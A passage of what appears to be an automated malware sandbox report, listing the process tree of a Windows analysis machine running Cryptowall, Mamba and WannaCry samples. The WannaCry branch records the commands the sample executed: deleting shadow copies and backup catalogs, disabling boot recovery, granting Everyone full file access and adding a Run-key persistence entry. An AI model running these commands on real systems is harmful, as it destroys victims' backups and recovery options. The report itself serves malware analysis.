  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9d79ecc40,0x7ff9d79ecc4c,0x7ff9d79ecc58
  2⤵
  PID:2088
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1800,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1796 /prefetch:2
  2⤵
  PID:976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2060,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2120 /prefetch:3
  2⤵
  PID:3384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2172 /prefetch:8
  2⤵
  PID:3168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3068,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3228 /prefetch:1
  2⤵
  PID:5000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:3344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3524,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4444 /prefetch:1
  2⤵
  PID:1544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4708,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4716 /prefetch:8
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4912,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4904 /prefetch:8
  2⤵
  PID:1476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=4672,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4572 /prefetch:1
  2⤵
  PID:1744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4748,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5036 /prefetch:8
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  PID:2868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=872,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3496 /prefetch:1
  2⤵
  PID:2432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5080,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5092 /prefetch:8
  2⤵
  - NTFS ADS
  PID:3636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3292,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5452 /prefetch:8
  2⤵
  - NTFS ADS
  PID:1888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5476,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5304 /prefetch:8
  2⤵
  - NTFS ADS
  PID:3020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5416,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4720 /prefetch:8
  2⤵
  - NTFS ADS
  PID:3976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5424,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3264 /prefetch:8
  2⤵
  - NTFS ADS
  PID:4584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2440,i,14136893670035498909,4785614864655858147,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5312 /prefetch:8
  2⤵
  - NTFS ADS
  PID:4724

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:1116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1920

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3968

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4528
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Cryptowall.zip\cryptowall.bin"
  2⤵
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:2352
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    PID:1180
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1B2DD6E1A450156DF1FB3E8018FD179F --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:2908
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=27EBAB2340FF02EEABFC17F1EC508B0A --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=27EBAB2340FF02EEABFC17F1EC508B0A --renderer-client-id=2 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:1
      4⤵
      PID:2528
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=62D9A7945BBFD1A909E5F8D9C8ABA9B1 --mojo-platform-channel-handle=2376 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:3204
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A2EF8E520B724D35916D64B6D9F66F4B --mojo-platform-channel-handle=1956 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:1532
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D34F20ED61DE349962A07EE4F307E79A --mojo-platform-channel-handle=1780 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      PID:796

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3112

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:2600

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c1de3cb8,0x7ff9c1de3cc8,0x7ff9c1de3cd8
  2⤵
  PID:1324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,3969927300386764840,5959685658266166396,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:2
  2⤵
  PID:3576
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,3969927300386764840,5959685658266166396,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,3969927300386764840,5959685658266166396,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2524 /prefetch:8
  2⤵
  PID:3448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,3969927300386764840,5959685658266166396,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3180 /prefetch:1
  2⤵
  PID:1748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,3969927300386764840,5959685658266166396,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:1580

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4884

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:864

C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe"
1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:2768
- C:\Windows\SysWOW64\attrib.exe
  attrib +h .
  2⤵
  - Views/modifies file attributes
  PID:2424
- C:\Windows\SysWOW64\icacls.exe
  icacls . /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  - System Location Discovery: System Language Discovery
  PID:1256
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4972
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c 313601724937283.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3364
- - C:\Windows\SysWOW64\cscript.exe
    cscript.exe //nologo m.vbs
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3108
- C:\Windows\SysWOW64\attrib.exe
  attrib +h +s F:\$RECYCLE
  2⤵
  - System Location Discovery: System Language Discovery
  - Views/modifies file attributes
  PID:2196
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected] co
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2036
- - C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\TaskData\Tor\taskhsvc.exe
    TaskData\Tor\taskhsvc.exe
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    PID:3356
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b @[email protected] vs
  2⤵
  PID:1864
- - C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
    @[email protected] vs
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:4396
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      4⤵
      PID:1328
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        
        PID:1304
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2188
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:240
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:3464
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tcofzwqenj709" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
  2⤵
  PID:1008
- - C:\Windows\SysWOW64\reg.exe
    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "tcofzwqenj709" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\tasksche.exe\"" /f
    3⤵
    - Adds Run key to start application
    - Modifies registry key
    PID:1984
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4572
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:3824
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4176
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2324
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2028
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3136
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2416
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5012
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:992
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2592
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2828
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4300
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3344
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2076
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:3904
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:2324
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2244
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:2064
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
